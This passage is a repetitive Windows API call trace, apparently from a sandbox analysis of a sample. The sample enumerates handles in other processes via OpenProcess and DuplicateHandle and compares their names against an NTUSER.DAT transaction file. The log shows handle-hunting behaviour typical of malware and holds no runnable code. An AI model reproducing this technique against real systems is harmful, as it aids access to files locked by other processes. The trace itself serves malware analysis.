dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.489] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.489] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.490] CloseHandle (hObject=0x1e4) returned 1 [0164.490] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.490] CloseHandle (hObject=0x194) returned 1 [0164.490] CloseHandle (hObject=0x1e8) returned 1 [0164.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.490] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.491] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.492] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.492] CloseHandle (hObject=0x1e4) returned 1 [0164.492] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.492] CloseHandle (hObject=0x194) returned 1 [0164.492] CloseHandle (hObject=0x1e8) returned 1 [0164.492] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.492] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.492] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.493] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.494] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.494] CloseHandle (hObject=0x1e4) returned 1 [0164.494] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0164.494] CloseHandle (hObject=0x194) returned 1 [0164.494] CloseHandle (hObject=0x1e8) returned 1 [0164.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.494] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xe38, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.495] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.495] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.495] CloseHandle (hObject=0x1e4) returned 1 [0164.496] _wcsicmp (_Str1="\\ReportingEvents.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0164.496] CloseHandle (hObject=0x194) returned 1 [0164.496] CloseHandle (hObject=0x1e8) returned 1 [0164.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.496] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.497] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.498] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.498] CloseHandle (hObject=0x1e4) returned 1 [0164.498] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.498] CloseHandle (hObject=0x194) returned 1 [0164.498] CloseHandle (hObject=0x1e8) returned 1 [0164.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.498] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1064, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.499] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.500] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.500] CloseHandle (hObject=0x1e4) returned 1 [0164.500] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.500] CloseHandle (hObject=0x194) returned 1 [0164.500] CloseHandle (hObject=0x1e8) returned 1 [0164.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.500] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.501] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.502] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.502] CloseHandle (hObject=0x1e4) returned 1 [0164.502] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.502] CloseHandle (hObject=0x194) returned 1 [0164.502] CloseHandle (hObject=0x1e8) returned 1 [0164.502] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.502] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.503] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.504] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.504] CloseHandle (hObject=0x1e4) returned 1 [0164.504] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.504] CloseHandle (hObject=0x194) returned 1 [0164.504] CloseHandle (hObject=0x1e8) returned 1 [0164.504] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.504] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.505] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.506] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.506] CloseHandle (hObject=0x1e4) returned 1 [0164.506] CloseHandle (hObject=0x194) returned 1 [0164.506] CloseHandle (hObject=0x1e8) returned 1 [0164.506] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.506] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x110c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.507] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.511] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.511] CloseHandle (hObject=0x1e4) returned 1 [0164.511] CloseHandle (hObject=0x194) returned 1 [0164.511] CloseHandle (hObject=0x1e8) returned 1 [0164.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.511] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.512] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.513] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.513] CloseHandle (hObject=0x1e4) returned 1 [0164.513] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.513] CloseHandle (hObject=0x194) returned 1 [0164.514] CloseHandle (hObject=0x1e8) returned 1 [0164.514] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.514] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.515] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.515] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.515] CloseHandle (hObject=0x1e4) returned 1 [0164.516] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.516] CloseHandle (hObject=0x194) returned 1 [0164.516] CloseHandle (hObject=0x1e8) returned 1 [0164.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.516] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x118c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.516] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.517] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.517] CloseHandle (hObject=0x1e4) returned 1 [0164.517] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0164.517] CloseHandle (hObject=0x194) returned 1 [0164.518] CloseHandle (hObject=0x1e8) returned 1 [0164.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0164.518] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.518] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.519] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.519] CloseHandle (hObject=0x1e4) returned 1 [0164.519] _wcsicmp (_Str1="\\wuaueng.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.519] CloseHandle (hObject=0x194) returned 1 [0164.519] CloseHandle (hObject=0x1e8) returned 1 [0164.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0164.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.519] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.520] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.521] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.521] CloseHandle (hObject=0x1e4) returned 1 [0164.521] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.521] CloseHandle (hObject=0x194) returned 1 [0164.521] CloseHandle (hObject=0x1e8) returned 1 [0164.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.521] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.522] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.523] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.523] CloseHandle (hObject=0x1e4) returned 1 [0164.524] CloseHandle (hObject=0x194) returned 1 [0164.524] CloseHandle (hObject=0x1e8) returned 1 [0164.524] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.524] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.525] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.525] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.526] CloseHandle (hObject=0x1e4) returned 1 [0164.526] CloseHandle (hObject=0x194) returned 1 [0164.526] CloseHandle (hObject=0x1e8) returned 1 [0164.526] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.526] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.527] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.527] CloseHandle (hObject=0x1e4) returned 1 [0164.527] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.527] CloseHandle (hObject=0x194) returned 1 [0164.528] CloseHandle (hObject=0x1e8) returned 1 [0164.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.528] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x190, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.528] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.529] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.529] CloseHandle (hObject=0x1e4) returned 1 [0164.529] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.529] CloseHandle (hObject=0x194) returned 1 [0164.529] CloseHandle (hObject=0x1e8) returned 1 [0164.529] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0164.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.530] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.530] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.531] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.531] CloseHandle (hObject=0x1e4) returned 1 [0164.532] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.532] CloseHandle (hObject=0x194) returned 1 [0164.532] CloseHandle (hObject=0x1e8) returned 1 [0164.532] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.532] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.533] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.534] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.534] CloseHandle (hObject=0x1e4) returned 1 [0164.534] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.534] CloseHandle (hObject=0x194) returned 1 [0164.534] CloseHandle (hObject=0x1e8) returned 1 [0164.534] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.534] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.534] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.535] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.536] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.536] CloseHandle (hObject=0x1e4) returned 1 [0164.536] CloseHandle (hObject=0x194) returned 1 [0164.536] CloseHandle (hObject=0x1e8) returned 1 [0164.536] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.536] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.537] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.538] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.538] CloseHandle (hObject=0x1e4) returned 1 [0164.538] CloseHandle (hObject=0x194) returned 1 [0164.538] CloseHandle (hObject=0x1e8) returned 1 [0164.538] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.538] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.539] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.540] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.540] CloseHandle (hObject=0x1e4) returned 1 [0164.540] _wcsicmp (_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.540] CloseHandle (hObject=0x194) returned 1 [0164.540] CloseHandle (hObject=0x1e8) returned 1 [0164.540] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.541] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.541] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.542] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.542] CloseHandle (hObject=0x1e4) returned 1 [0164.542] CloseHandle (hObject=0x194) returned 1 [0164.542] CloseHandle (hObject=0x1e8) returned 1 [0164.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.543] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.543] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.544] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.544] CloseHandle (hObject=0x1e4) returned 1 [0164.544] CloseHandle (hObject=0x194) returned 1 [0164.545] CloseHandle (hObject=0x1e8) returned 1 [0164.545] 